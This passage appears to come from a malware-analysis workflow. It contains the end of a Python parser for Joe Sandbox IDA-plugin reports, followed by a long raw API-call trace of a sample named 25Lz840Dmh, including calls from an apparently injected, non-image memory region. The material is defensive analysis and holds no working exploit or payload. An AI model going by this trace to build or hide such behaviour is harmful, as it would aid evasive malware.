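HEX32 = re.compile(r"[0-9A-Fa-f]{8}")  # the sandbox prints every constant as 8 hex digits


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int               # address of the call instruction
    caller: Optional[int]  # set when the call sits in a "Part of subcall function" line

    def string_args(self) -> list:
        # Neither a hex constant nor the "?" placeholder: a literal the sandbox
        # recovered, such as ">>>AUTOIT NO CMDEXECUTE<<<".
        return [a for a in self.args if a != "?" and not HEX32.fullmatch(a)]


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    source_file: Optional[str] = None
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None  # "based on PE: true/false"
    fields: dict = field(default_factory=dict)  # API ID, API String ID, hashes, ...


def parse_blocks(text: str) -> list:
    """Split the export into one FunctionBlock per record; header lines are skipped."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            caller = int(m["caller"], 16) if m["caller"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
        elif m := SOURCE_RE.match(line):
            cur.source_file, cur.offset = m["file"], int(m["offset"], 16)
            cur.pe_backed = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"]] = m["value"].strip()
            if m["key"] == "Instruction Fuzzy Hash":  # last line of every record
                blocks.append(cur)
                cur = FunctionBlock()
    return blocks


def calls_outside_images(blocks: list) -> list:
    """(offset, API) for calls made from a region with 'based on PE: false': memory that
    is not a mapped image, i.e. unpacked or injected code. Review these first."""
    return [(hex(b.offset), c.name) for b in blocks if b.pe_backed is False for c in b.calls]


def recovered_strings(blocks: list) -> list:
    """Every literal string the sandbox saw passed to an API, deduplicated."""
    return sorted({s for b in blocks for c in b.calls for s in c.string_args()})
```

Two details worth knowing when reading the output. The first argument the 00BF0000 image passes to MultiByteToWideChar, 0000FDE9, is code page 65001 (CP_UTF8), so those two calls are plain UTF-8 to UTF-16 conversions, not anything exotic. And the API String ID, Opcode ID and fuzzy hashes are computed by the sandbox; the parser carries them verbatim so that functions can be matched across reports by exact value, it does not try to recompute them.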
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00BF5B96
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 79746a13db2a5a0df6859d4aa868165cfc39035c707e43d2840e2e120b2fcf28
                                                  • Instruction ID: d75541e348802952444e2fbd5a2e12e173ac9ada1f1a650ef52ea871e57c8a0d
                                                  • Opcode Fuzzy Hash: 79746a13db2a5a0df6859d4aa868165cfc39035c707e43d2840e2e120b2fcf28
                                                  • Instruction Fuzzy Hash: F3314C31A00A19AFCB28DF6CD484AADF7F5FF48310F1486A9EA1993711D770B994CB90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 5ec569616a677ead53a80d10f79a3074ccf6001df5f5de218b7d57dd63aa2343
                                                  • Instruction ID: 9f2ebd20bb191924d51eaf70645c89b161229131293dedefbdcdc5c952b51c08
                                                  • Opcode Fuzzy Hash: 5ec569616a677ead53a80d10f79a3074ccf6001df5f5de218b7d57dd63aa2343
                                                  • Instruction Fuzzy Hash: F34127B45043559FDB24CF14C494B2ABBE1FF45318F1988ACE9998B762C331E889CF52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e602571a50c8cd3fea902fd083a6ea751393e60886a2e5e7eea12d5b2d395db
                                                  • Instruction ID: b0416dc3f5b44aa3ad0bed3e29d9c4c32e11302ea0ed8926320d7458526ac160
                                                  • Opcode Fuzzy Hash: 9e602571a50c8cd3fea902fd083a6ea751393e60886a2e5e7eea12d5b2d395db
                                                  • Instruction Fuzzy Hash: FC21E2364052289FC311AF58EC859D6B7A8FF43B71F214299E4A5CB5B0D7704D8ECBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 3e6e83ae6e3fe16dd294fd676820fa3de3e275a32c0e5609978d921726056653
                                                  • Instruction ID: 4a63428c69db646c30f437a628395fb915cd649ad363a32ab423bb2d3a573517
                                                  • Opcode Fuzzy Hash: 3e6e83ae6e3fe16dd294fd676820fa3de3e275a32c0e5609978d921726056653
                                                  • Instruction Fuzzy Hash: C6210271904A18EBCB109F52F8857AE7FF8FF65350F3188AAE586C6411EBB094E0E741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp
                                                  • String ID:
                                                  • API String ID: 856254489-0
                                                  • Opcode ID: 54809536a25fe80c226fc27ae408e4954acf569bf4a1f34566957137d398d483
                                                  • Instruction ID: fb1276e7fa53701ffa9a547dee8095859b3a0bcb79df311b1b422f092dd24485
                                                  • Opcode Fuzzy Hash: 54809536a25fe80c226fc27ae408e4954acf569bf4a1f34566957137d398d483
                                                  • Instruction Fuzzy Hash: 8011D23191411CEBCF14EFA9CC429FEB7B8EF51760F0441A6FA11A7190DA309E49CBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
                                                  • Instruction ID: 10ff3c11370e15586eaa3f44c9df4d26bd83300c332a7bed761698043e7b85ea
                                                  • Opcode Fuzzy Hash: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
                                                  • Instruction Fuzzy Hash: DE118C716007059FD728DF15D451972B7F5EB8A720B14C8AEE64A8B691DB30E880DA00
                                                  APIs
                                                    • Part of subcall function 00BF4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00BF4BEF
                                                    • Part of subcall function 00C1525B: __wfsopen.LIBCMT ref: 00C15266
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E0F
                                                    • Part of subcall function 00BF4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BF4BA4
                                                    • Part of subcall function 00BF4C70: _memmove.LIBCMT ref: 00BF4CBA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: e1886e0891b7b4ea9fdf70e6097f0ced0dd2e145aa52b1d300e676094b9de09e
                                                  • Instruction ID: 3cc43fd38647a003f8ed4cf4c568da60b9090c4fb50728eddf53c642ff86ea88
                                                  • Opcode Fuzzy Hash: e1886e0891b7b4ea9fdf70e6097f0ced0dd2e145aa52b1d300e676094b9de09e
                                                  • Instruction Fuzzy Hash: 6C11E735600209EBCF14AF74C852FBF77E4AF44710F1088ADF646A7192DB719A09AB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 3c494d221abba174857fc5c7c7ed21131f103e5949922dec5d5b0d7073262e2d
                                                  • Instruction ID: 0a461ac59beb7040df1b53e1d88f763c9f9a51f23eac1598f2ac70bedc65513e
                                                  • Opcode Fuzzy Hash: 3c494d221abba174857fc5c7c7ed21131f103e5949922dec5d5b0d7073262e2d
                                                  • Instruction Fuzzy Hash: 222146B4508305DFCB14DF64C484B2ABBE0BF88304F0588ACF98947761C731E859DB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                  • Instruction ID: 50bd5e536956f5ade2e12b8eb51a13cc2a552c62db94dad102cb5acddb634110
                                                  • Opcode Fuzzy Hash: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                  • Instruction Fuzzy Hash: 3C11E5722092196BD714AF2CD881D7AB3D9EF8932072445AAFE19C7290DF31AC189790
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00BF56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BF5C16
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00C148A6
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C107B0
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 022808EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00C2DD42,?,?,00000000), ref: 00BF5C5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 022808BB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C31DF0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PathTemp
                                                  • String ID:
                                                  • API String ID: 2920410445-0
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00C5D1FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C7CB37
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7CB95
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7CBD6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7CC00
                                                  • SendMessageW.USER32 ref: 00C7CC29
                                                  • _wcsncpy.LIBCMT ref: 00C7CC95
                                                  • GetKeyState.USER32(00000011), ref: 00C7CCB6
                                                  • GetKeyState.USER32(00000009), ref: 00C7CCC3
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7CCD9
                                                  • GetKeyState.USER32(00000010), ref: 00C7CCE3
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7CD0C
                                                  • SendMessageW.USER32 ref: 00C7CD33
                                                  • SendMessageW.USER32(?,00001030,?,00C7B348), ref: 00C7CE37
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C7CE4D
